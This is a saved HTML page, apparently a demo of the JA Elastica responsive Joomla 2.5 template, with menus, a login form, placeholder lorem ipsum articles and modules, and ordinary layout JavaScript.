href="http://joomla25-templates.joomlart.com/ja_elastica/#" class="mega last" id="menu544" title="Modules Class Suffix"><span class="menu-title">Modules Class Suffix</span></a></li></ul></div></div></li></ul></div></div>
</div></div></li><li class="mega last haschild"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25.html" class="mega last haschild " id="menu508" title="About Joomla! 2.5"><span class="menu-title">About Joomla! 2.5</span><span class="menu-desc">The best CMS ever!</span></a><div class="childcontent cols2 " style="width: 578px; height: 292px; display: block; ">
<div class="childcontent-inner-wrap" style="width: 568px; ">
<div class="childcontent-inner clearfix" style="width: 568px;"><div class="megacol column1 first" style="width: 200px;"><ul class="megamenu level1"><li class="mega first group"><div class="group"><div class="group-title"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25.html" class="mega first group" id="menu509" title="What&#39;s New in 2.5?"><span class="menu-title">What's New in 2.5?</span></a></div><div class="group-content"><ul class="megamenu level1"><li class="mega first"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/joomla-extensions.html" class="mega first" id="menu529" title="Joomla! Extensions"><span class="menu-title">Joomla! Extensions</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/the-joomla-project.html" class="mega" id="menu530" title="The Joomla! Project"><span class="menu-title">The Joomla! Project</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/example-pages.html" class="mega" id="menu534" title="Example Pages"><span class="menu-title">Example Pages</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/the-news.html" class="mega" id="menu532" title="The News"><span class="menu-title">The News</span></a></li><li class="mega last"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/contact.html" class="mega last" id="menu545" title="Contact"><span class="menu-title">Contact</span></a></li></ul></div></div></li></ul></div><div class="megacol column2 last" style="width: 368px;"><ul class="megamenu level1"><li class="mega first group"><div class="group"><div class="group-content">	<div class="ja-moduletable ja-masonry moduletable" id="Mod82">
		<div class="moduletable-inner clearfix">
									<div class="ja-box-ct clearfix">
			

<div class="custom">
	<img src="./Joomla 2.5 Responsive Web Design_files/sam-12.jpg" alt="Responsive web design">

Resize browser to see the magic. And experience the ride with your wide screen, laptop, ipad, kindle, iphone or any handheld device.</div>
			</div>
		</div>
    </div>
	</div></div></li></ul></div></div>
</div></div></li></ul>
</div>            <script type="text/javascript">
                var megamenu = new jaMegaMenuMoo ('ja-megamenu', {
                    'bgopacity': 0,
                    'delayHide': 300,
                    'slide'    : 0,
                    'fading'   : 0,
                    'direction': 'down',
                    'action'   : 'mouseover',
                    'tips'     : false,
                    'duration' : 300,
                    'hidestyle': 'fastwhenshow'
                });
            </script>
            </div>

<div id="ja-top" class="clearfix">
		<div id="ja-search" class="active">
		<span class="search-btn">Search</span>
		<form action="./Joomla 2.5 Responsive Web Design_files/Joomla 2.5 Responsive Web Design.htm" method="post" class="search">
		<label for="mod-search-searchword">Search...</label><input name="searchword" id="mod-search-searchword" maxlength="20" class="inputbox" type="text" size="20" value="Search..." onblur="if (this.value==&#39;&#39;) this.value=&#39;Search...&#39;;" onfocus="if (this.value==&#39;Search...&#39;) this.value=&#39;&#39;;">	<input type="hidden" name="task" value="search">
	<input type="hidden" name="option" value="com_search">
	<input type="hidden" name="Itemid" value="435">
</form>

	</div>
	<script type="text/javascript">
		// toggle search box active when click on search button
		$$('.search-btn').addEvent ('mouseenter', function () {
			// focus on search box
			$('mod-search-searchword').focus();
		});
		$('mod-search-searchword').addEvents ({
			'blur': function () {$('ja-search').removeClass ('active');},
			'focus': function () {$('ja-search').addClass ('active');}
		});
	</script>
			<div id="ja-social">
		

<div class="custom">
	<ul class="ja-social">
<li class="social-twitter"><a href="http://twitter.com/joomlart" title="Twitter">Twitter</a></li>
<li class="social-facebook"><a href="http://www.facebook.com/joomlart" title="Facebook">Facebook</a></li>
<li class="social-gplus"><a href="https://plus.google.com/u/0/116006606347148002866/posts" title="Google+">Google+</a></li>
<li class="social-rss"><a href="http://joomla25-templates.joomlart.com/ja_elastica/#" title="RSS">RSS</a></li>
</ul></div>

	</div>
	</div>

<ul class="no-display">
    <li><a href="http://joomla25-templates.joomlart.com/ja_elastica/#ja-content" title="Skip to content">Skip to content</a></li>
</ul>                </div>
                            </div>
                        </div>
            
	<!-- MAIN CONTAINER -->
	<div id="ja-container" class="wrap ja-r2 clearfix">
		<div id="ja-main-wrap" class="main clearfix">
			<div id="ja-main" class="clearfix masonry" style="position: relative; height: 1632px; ">
									<div id="ja-content" class="ja-content ja-masonry masonry-brick" style="position: absolute; top: 0px; left: 0px; ">
											
						<div id="ja-content-main" class="ja-content-main cleafix">
							
<div id="system-message-container">
</div>							

<div class="blog-featured ja-frontpage">


<div class="items-leading">
			<div class="leading leading-0 clearfix">
			
<div class="contentpaneopen clearfix">


	<h2 class="contentheading">
					<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/70-responsive-joomla-25-template.html">
			Responsive Joomla 2.5 Template</a>
			</h2>



<div class="article-tools clearfix">
 <dl class="article-info">
 <dt class="article-info-term">Details</dt>
		<dd class="category-name">
										Category: <span><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore.html">Template guide</a></span>						</dd>
		<dd class="published">
				Published on <span>10 November 2010</span>		</dd>
 </dl>

	<ul class="actions">
				<li class="print-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/70-responsive-joomla-25-template.html?tmpl=component&print=1&layout=default&page=" title="Print" onclick="window.open(this.href,&#39;win2&#39;,&#39;status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no&#39;); return false;" rel="nofollow"><img src="./Joomla 2.5 Responsive Web Design_files/printButton.png" alt="Print"></a>		</li>
						<li class="email-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/component/mailto/?tmpl=component&template=ja_elastica&link=e62859b03460be5bcf12e2384cb5916bde4d4b6b" title="Email" onclick="window.open(this.href,&#39;win2&#39;,&#39;width=400,height=350,menubar=yes,resizable=yes&#39;); return false;"><img src="./Joomla 2.5 Responsive Web Design_files/emailButton.png" alt="Email"></a>		</li>
		
			</ul>
</div>


<p><img src="./Joomla 2.5 Responsive Web Design_files/sam-1.jpg" border="0" alt="Sample image" title="Sample image"></p>
<p>Gravida id at Aenean natoque et consequat a Fusce Suspendisse turpis. Ut platea tincidunt Sed ut nibh justo augue adipiscing ac nibh. In habitasse tellus Vestibulum semper nibh dui In justo Sed consequat. Morbi id turpis enim et eget Nam at orci sapien scelerisque. Odio id dictum id elit Donec Vestibulum at nec in a. Hendrerit eleifend vel enim rutrum id.</p>

		<p class="readmore">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/70-responsive-joomla-25-template.html">
					Read more...</a>
		</p>


</div>

<div class="item-separator"></div>
		</div>
			</div>
	
	
		<div class="items-row cols-2 row-0 clearfix">
				<div class="item column-1">
			
<div class="contentpaneopen clearfix">


	<h2 class="contentheading">
					<a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/example-pages.html">
			Responsive Template Joomla 2.5</a>
			</h2>



<div class="article-tools clearfix">
 <dl class="article-info">
 <dt class="article-info-term">Details</dt>
		<dd class="category-name">
										Category: <span><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore.html">Template guide</a></span>						</dd>
		<dd class="published">
				Published on <span>10 November 2010</span>		</dd>
 </dl>

	<ul class="actions">
				<li class="print-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/example-pages.html?tmpl=component&print=1&page=" title="Print" onclick="window.open(this.href,&#39;win2&#39;,&#39;status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no&#39;); return false;" rel="nofollow"><img src="./Joomla 2.5 Responsive Web Design_files/printButton.png" alt="Print"></a>		</li>
						<li class="email-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/component/mailto/?tmpl=component&template=ja_elastica&link=49d7bc1cf7ee939ba06e5243112591e7fb3f00ff" title="Email" onclick="window.open(this.href,&#39;win2&#39;,&#39;width=400,height=350,menubar=yes,resizable=yes&#39;); return false;"><img src="./Joomla 2.5 Responsive Web Design_files/emailButton.png" alt="Email"></a>		</li>
		
			</ul>
</div>


<p><img src="./Joomla 2.5 Responsive Web Design_files/sam-2.jpg" border="0" alt="Sample image" title="Sample image"></p>
<p>Ut et ante pretium ornare natoque ut eget urna non in. Risus congue Maecenas laoreet gravida id in augue malesuada id id. Feugiat vitae Suspendisse ut id nonummy dapibus molestie at rutrum et. Dui dolor vel accumsan In interdum non sapien et <a href="http://joomla25-templates.joomlart.com/ja_elastica/#" title="Sample link">Phasellus odio.</a></p>

		<p class="readmore">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25/whats-new-in-25/example-pages.html">
					Read more...</a>
		</p>


</div>

<div class="item-separator"></div>
		</div>
						
			<div class="item column-2">
			
<div class="contentpaneopen clearfix">


	<h2 class="contentheading">
					<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/69-fluid-a-responsive-design.html">
			Joomla 2.5 Fluid &amp; Responsive Design template</a>
			</h2>



<div class="article-tools clearfix">
 <dl class="article-info">
 <dt class="article-info-term">Details</dt>
		<dd class="category-name">
										Category: <span><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore.html">Template guide</a></span>						</dd>
		<dd class="published">
				Published on <span>10 November 2010</span>		</dd>
 </dl>

	<ul class="actions">
				<li class="print-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/69-fluid-a-responsive-design.html?tmpl=component&print=1&layout=default&page=" title="Print" onclick="window.open(this.href,&#39;win2&#39;,&#39;status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no&#39;); return false;" rel="nofollow"><img src="./Joomla 2.5 Responsive Web Design_files/printButton.png" alt="Print"></a>		</li>
						<li class="email-icon">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/component/mailto/?tmpl=component&template=ja_elastica&link=c296d1c8a1eed877569e062bb25041f3769e8326" title="Email" onclick="window.open(this.href,&#39;win2&#39;,&#39;width=400,height=350,menubar=yes,resizable=yes&#39;); return false;"><img src="./Joomla 2.5 Responsive Web Design_files/emailButton.png" alt="Email"></a>		</li>
		
			</ul>
</div>


<p><img src="./Joomla 2.5 Responsive Web Design_files/sam-3.jpg" border="0" alt="Sample image" title="Sample image"></p>
<p><strong>Lorem ipsum</strong> dolor sit amet consectetuer velit nunc tellus gravida Lorem. Orci neque mauris nibh ligula mauris Aenean eu sit sem laoreet. Et ipsum accumsan dis et semper rhoncus Vestibulum ut et est. Leo In Praesent sed Lorem nascetur id tempus et ac semper.</p>

		<p class="readmore">
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/69-fluid-a-responsive-design.html">
					Read more...</a>
		</p>


</div>

<div class="item-separator"></div>
		</div>
									<!--span class="row-separator"></span-->
			</div>
				


</div>

						</div>
						
												
					</div>
													
							<div class="ja-moduletable ja-masonry moduletable grid-double mod-contrast contrast-blue masonry-brick" id="Mod97" style="position: absolute; top: 0px; left: 480px; ">
		<div class="moduletable-inner clearfix">
									<div class="ja-box-ct clearfix">
			

<div class="custom grid-double mod-contrast contrast-blue">
	<div id="ja-twitter-wrap">
<p>Did you guys try out this responsive Joomla 2.5 web design?</p>
<span class="date">_ about 3 hours ago</span></div></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable grid-double badge-hot masonry-brick" id="Mod108" style="position: absolute; top: 126px; left: 480px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Responsive Web Design</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom grid-double badge-hot">
	Sagittis interdum Ut semper tempus adipiscing Curabitur wisi eu at Cras. Id eros eu consequat quis fringilla volutpat urna ut Ut eu. A velit quam amet In urna ut Vivamus Lorem sed vitae. Tellus interdum Curabitur sollicitudin justo congue id nisl ac porta sociis. “<strong>lobortis eros ultrices tortor augue tristique.</strong>” </div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable_menu masonry-brick" id="Mod1" style="position: absolute; top: 0px; left: 960px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Main Menu</span></h3>
						<div class="ja-box-ct clearfix">
			
<ul class="menu">
<li class="item-435 current active"><a href="./Joomla 2.5 Responsive Web Design_files/Joomla 2.5 Responsive Web Design.htm">Home</a></li><li class="item-506 parent"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore.html">Explore</a></li><li class="item-508 parent"><a href="http://joomla25-templates.joomlart.com/ja_elastica/about-joomla-25.html">About Joomla! 2.5</a></li></ul>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-top masonry-brick" id="Mod106" style="position: absolute; top: 199px; left: 960px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Badge top</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-top">
	Lacinia mollis leo wisi ridiculus <a href="http://joomla25-templates.joomlart.com/ja_elastica/#" title="Sample title">sed pellentesque</a> condimentum condimentum nunc tincidunt.</div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-dark masonry-brick" id="Mod92" style="position: absolute; top: 324px; left: 480px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Template features</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-dark">
	<div class="ja-innerdiv clearfix">
<strong class="txt-red">1. Responsive</strong><br>
Pellentesque auctor leo fringilla pulvinar.
</div>

<div class="ja-innerdiv clearfix">
<strong class="txt-green">2. Grid System</strong><br>
Pellentesque auctor leo fringilla pulvinar.
</div>

<div class="ja-innerdiv clearfix">
<strong class="txt-blue">3. Multiple Block style</strong><br>
Pellentesque auctor leo fringilla pulvinar.
</div></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-red masonry-brick" id="Mod93" style="position: absolute; top: 324px; left: 720px; ">
		<div class="moduletable-inner clearfix">
									<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-red">
	<div class="big-quote">
<blockquote>JA Elastica is our first responsive web design!</blockquote>
</div>
<p><span class="author">_ JoomlArt</span></p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable masonry-brick" id="Mod16" style="position: absolute; top: 377px; left: 960px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Login Form</span></h3>
						<div class="ja-box-ct clearfix">
			<form action="./Joomla 2.5 Responsive Web Design_files/Joomla 2.5 Responsive Web Design.htm" method="post" id="login-form">
		<fieldset class="userdata">
	<p id="form-login-username">
		<label for="modlgn-username">User Name</label>
		<input id="modlgn-username" type="text" name="username" class="inputbox" size="18">
	</p>
	<p id="form-login-password">
		<label for="modlgn-passwd">Password</label>
		<input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18">
	</p>
		<p id="form-login-remember">
		<label for="modlgn-remember">Remember Me</label>
		<input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes">
	</p>
		<p id="form-login-submit">
        <input type="submit" name="Submit" class="button" value="Log in">
    </p>
	<input type="hidden" name="option" value="com_users">
	<input type="hidden" name="task" value="user.login">
	<input type="hidden" name="return" value="aW5kZXgucGhwP0l0ZW1pZD00MzU=">
	<input type="hidden" name="92e1b73e9d7f15b9533741baf521f44f" value="1">	</fieldset>
	<ul>
		<li>
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/using-joomla/extensions/components/users-component/password-reset.html">
			Forgot your password?</a>
		</li>
		<li>
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/using-joomla/extensions/components/users-component/username-reminder.html">
			Forgot your username?</a>
		</li>
				<li>
			<a href="http://joomla25-templates.joomlart.com/ja_elastica/using-joomla/extensions/components/users-component/registration-form.html">
				Create an account</a>
		</li>
			</ul>
	</form>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-hot masonry-brick" id="Mod96" style="position: absolute; top: 470px; left: 720px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Badge hot</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-hot">
	Vitae vitae urna eros curabitur ipsum et eget <strong><a href="http://joomla25-templates.joomlart.com/ja_elastica/#" title="Sample link">lorem sem nibh</a></strong>. Dui nunc pharetra tincidunt urna nibh.</div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-new masonry-brick" id="Mod100" style="position: absolute; top: 648px; left: 720px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Badge new</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-new">
	Pellentesque sed aliquet mauris iaculis pretium dapibus porttitor. tincidunt sem quam Morbi nulla elit a tortor vitae.</div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-video masonry-brick" id="Mod99" style="position: absolute; top: 665px; left: 480px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Hot video</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-video">
	<a href="http://www.youtube.com/watch?v=aBvyc5P7Fsg" title="JA Elastica - Web Responsive Design Template for Joomla! "><img src="./Joomla 2.5 Responsive Web Design_files/sample-video.jpg" alt="Sample video" title="Sample video"></a>

<p>Quis eros Aliquam et diam ac a dolor nec nunc accumsan. Vitae velit tortor nunc dolor turpis.</p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-red masonry-brick" id="Mod105" style="position: absolute; top: 718px; left: 960px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Red module</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-red">
	<p class="blockheart"><span class="bigicon">&nbsp;</span>Sapien condimentum tellus ac In a eget molestie lacus et porttitor.</p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-photo masonry-brick" id="Mod94" style="position: absolute; top: 846px; left: 720px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>Our Gallery</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-photo">
	<img src="./Joomla 2.5 Responsive Web Design_files/sam-4.jpg" alt="Sample image">

<div style="margin-top: 5px;"><strong><small>Source: </small></strong> <a href="http://joomla25-templates.joomlart.com/ja_elastica/www.wallbase.net" title="Source" target="_blank">www.wallbase.net</a></div></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable badge-audio masonry-brick" id="Mod98" style="position: absolute; top: 876px; left: 960px; ">
		<div class="moduletable-inner clearfix">
			<span class="badge">&nbsp;</span>
						<h3><span>My love song</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom badge-audio">
	<img src="./Joomla 2.5 Responsive Web Design_files/audio-bg.png" alt="Audio">

Etiam pellentesque magna id lacus imperdiet ac vulputate enim semper. Donec tincidunt.</div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-blue masonry-brick" id="Mod101" style="position: absolute; top: 973px; left: 480px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Blue module</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-blue">
	<p class="blocktag"><span class="bigicon">&nbsp;</span>Sapien condimentum tellus ac In a eget molestie lacus et porttitor facilisi.</p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-violet masonry-brick" id="Mod107" style="position: absolute; top: 1083px; left: 960px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Violet module</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-violet">
	<p class="blockquestion"><span class="bigicon">&nbsp;</span>Sapien condimentum tellus ac In a eget molestie lacus et porttitor.</p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable masonry-brick" id="Mod39" style="position: absolute; top: 1151px; left: 480px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Who's Online</span></h3>
						<div class="ja-box-ct clearfix">
			
			<p>We have 10&nbsp;guests and no members online</p>

			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable_menu masonry-brick" id="Mod23" style="position: absolute; top: 1163px; left: 720px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>About Joomla!</span></h3>
						<div class="ja-box-ct clearfix">
			
<ul class="menu">
<li class="item-437"><a href="http://joomla25-templates.joomlart.com/ja_elastica/getting-started.html">Getting Started</a></li><li class="item-280 parent"><a href="http://joomla25-templates.joomlart.com/ja_elastica/using-joomla.html">Using Joomla!</a></li><li class="item-278"><a href="http://joomla25-templates.joomlart.com/ja_elastica/the-joomla-project.html">The Joomla! Project</a></li><li class="item-279"><a href="http://joomla25-templates.joomlart.com/ja_elastica/the-joomla-community.html">The Joomla! Community</a></li></ul>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-dark masonry-brick" id="Mod102" style="position: absolute; top: 1241px; left: 960px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Dark module</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-dark">
	<p class="blockmobile"><span class="bigicon">&nbsp;</span>Sapien condimentum tellus ac In a eget molestie lacus et porttitor.</p></div>
			</div>
		</div>
    </div>
		<div class="ja-moduletable ja-masonry moduletable mod-contrast contrast-green masonry-brick" id="Mod103" style="position: absolute; top: 1289px; left: 480px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Green module</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom mod-contrast contrast-green">
	<p class="blocklink"><span class="bigicon">&nbsp;</span>Sapien condimentum tellus ac In a eget molestie lacus et porttitor.</p></div>
			</div>
		</div>
    </div>
	
        	<div class="ja-moduletable ja-masonry moduletable grid-double masonry-brick" id="Mod89" style="position: absolute; top: 1399px; left: 720px; ">
		<div class="moduletable-inner clearfix">
									<h3><span>Joomla Tutorial</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom grid-double">
	<p><strong>How to Apply a Module Class Suffix in Joomla 2.5?</strong></p>
<ol>
<li>Login to backend.</li>
<li>Go to the Module Manager.</li>
<li>Select the Module you want to edit.</li>
<li>Type the Module Class Suffix into the parameters to the right.</li>
<li>Save the Setting.</li>
</ol></div>
			</div>
		</div>
    </div>
						
							</div>
								<div id="ja-extra-col" class="clearfix">
	<div id="ja-extra-col-loading" style="display: none; ">Loading ... </div>
<div class="ja-moduletable ja-masonry moduletable hide-in-normal" id="Mod104">
		<div class="moduletable-inner clearfix">
									<h3><span>Extra column</span></h3>
						<div class="ja-box-ct clearfix">
			

<div class="custom hide-in-normal">
	Parturient et Nam enim et orci wisi auctor consequat ante accumsan.</div>
			</div>
		</div>
    </div><div class="ja-moduletable ja-masonry moduletable_blank" id="Mod109">
		<div class="moduletable-inner clearfix">
									<div class="ja-box-ct clearfix">
			

<div class="custom_blank">
	<a href="http://www.joomlart.com/ipad2/" title="Sample link"><img src="./Joomla 2.5 Responsive Web Design_files/ipad2.jpg" alt="Sample banner"></a></div>
			</div>
		</div>
    </div><div class="ja-moduletable ja-masonry moduletable_blank" id="Mod112">
		<div class="moduletable-inner clearfix">
									<div class="ja-box-ct clearfix">
			<div class="bannergroup_blank">

	<div class="banneritem">
																																																															<a href="http://joomla25-templates.joomlart.com/ja_elastica/component/banners/click/9.html" target="_blank" title="Sample banner 1">
							<img src="./Joomla 2.5 Responsive Web Design_files/sample-banner.png" alt="Sample banner 1" width="214" height="100">
						</a>
																<div class="clr"></div>
	</div>
	<div class="banneritem">
																																														<img src="./Joomla 2.5 Responsive Web Design_files/sample-banner.png" alt="http://www.joomlart.com" width="214" height="100">
											<div class="clr"></div>
	</div>

</div>
			</div>
		</div>
    </div><div class="ja-moduletable ja-masonry moduletable_text grid-mass hide-in-normal" id="Mod85">
		<div class="moduletable-inner clearfix">
									<h3><span>Advertisement</span></h3>
						<div class="ja-box-ct clearfix">
			<div class="bannergroup_text grid-mass hide-in-normal">
	Featured Links:
	<div class="banneritem">
										<a href="http://www.joomla.org/" target="_blank">Joomla!</a>
<br>
Joomla! The most popular and widely used Open Source CMS Project in the world.				<div class="clr"></div>
	</div>
	<div class="banneritem">
										<a href="http://joomlacode.org/" target="_blank">JoomlaCode</a>
<br>
JoomlaCode, development and distribution made easy.				<div class="clr"></div>
	</div>
	<div class="banneritem">
										<a href="http://extensions.joomla.org/" target="_blank">Joomla! Extensions</a>
<br>
Joomla! Components, Modules, Plugins and Languages by the bucket load.				<div class="clr"></div>
	</div>
	<div class="banneritem">
										<a href="http://shop.joomla.org/" target="_blank">Joomla! Shop</a>
<br>
For all your Joomla! merchandise.				<div class="clr"></div>
	</div>

	<div class="bannerfooter">
		<a href="http://www.joomla.org/">Ads by Joomla!</a>	</div>
</div>
			</div>
		</div>
    </div></div>

<script type="text/javascript">
  // <![CDATA[ 
	/**
	 * call ajax to update content for this block 
	 * Ajax content is loaded only once time
	 */
	var jaLoadExtraCol = function () {
		// do nothing if extra-col not shown
		if (!$('ja-extra-col') || $('ja-extra-col').getStyle ('display')=='none') {
			return;
		}
		// do nothing if loaded
		if (this.loaded) {
			return;
		}
		this.loaded = true;
		// show progress
		$('ja-extra-col-loading').setStyle ('display', 'block');
		// using request.html to load ajax content. The content will be appended into ja-extra-col block
		var ajax = new Request.HTML ({
			'url': 'http://joomla25-templates.joomlart.com/ja_elastica/',
			append: $('ja-extra-col'),
			onComplete: function () {$('ja-extra-col-loading').setStyle ('display', 'none');}
		});
		// load content by ajax
					ajax.get ('ajax=modules&style=jaxhtml&name=extra-col');
			};
	
	window.addEvent ('load', jaLoadExtraCol);
	window.addEvent ('resize', jaLoadExtraCol);
  // ]]> 		
</script>
      						
		</div>
	</div>
    <!-- //MAIN CONTAINER -->

                <div id="ja-footer" class="wrap ">
                   <div class="main clearfix">
           <div class="ja-copyright">
    

<div class="custom">
	<img src="./Joomla 2.5 Responsive Web Design_files/partners.png" alt="Partners logo"></div>
<small>Copyright © 2012 JA Elastica J25. All Rights Reserved. Designed by <a href="http://www.joomlart.com/" title="Visit Joomlart.com!">JoomlArt.com</a>.</small>
<small><a href="http://www.joomla.org/">Joomla!</a> is Free Software released under the <a href="http://www.gnu.org/licenses/gpl-2.0.html">GNU General Public License.</a></small>
</div>



<div id="ja-poweredby" class="t3-logo t3-logo-light">
    <a href="http://t3.joomlart.com/" title="Powered By T3 Framework" target="_blank">Powered By T3 Framework</a>
</div>            </div>
                        </div>
            <script type="text/javascript">

jQuery(function($){
	var $container = $('#ja-main');

	var curr_layout = '';
	var colW = 0;
	
	//detect layout width
	if ($(window).width() >= 720) {
		curr_layout = 'fixed';
		colW = 240;
	} else { 
		curr_layout = 'fluid';
		colW = $container.width() / 2;
	}
	//init layout masonry
	$container.masonry({
		itemSelector: '.ja-masonry',
		columnWidth : colW,
		isAnimated: true,
		isResizable: true
	});
	
	var reloadMasonry = function () {
		$container.masonry( 'reload' );
	};
	
	//change columnWidth depend on the wrapper width, specify for this template
	$(window).bind( 'smartresize.masonry', function() { 
        //detect layout width
		if ($('#ja-main').width() >= 720) {
			//fix width layout - reload one time			
			if (curr_layout != 'fixed') {
				curr_layout = 'fixed';
				$container.masonry( 'option', { columnWidth: 240, isResizable: true } );
				$container.masonry( 'reload' );
			}
		} else {
			//update column width
			$container.masonry( 'option', { columnWidth: $container.width() / 2, isResizable: false } );
			//reload layout
			$container.masonry( 'reload' );

			curr_layout = 'fluid';
		}
  });

	// Check bricks height changed - relayout
	$(function (){
		//store height for all bricks
		$('.ja-masonry').each (function(i, el){
			var el = $(this);
			el.data('h', el.height());
		});
		
		//interval check
		$container.data('interval-timer', setInterval(function () {
			//detect change on masonry bricks height
			$('.ja-masonry').each (function(i){
				var el = $(this);
				if (el.data('h') != el.height()) {
					el.data('h', el.height());
					reloadMasonry ();
					return false;
				}
			});
		}, 2000));
	});
}); 
</script>
</div>





<div id="mixpanel" style="visibility: hidden; "></div></body></html>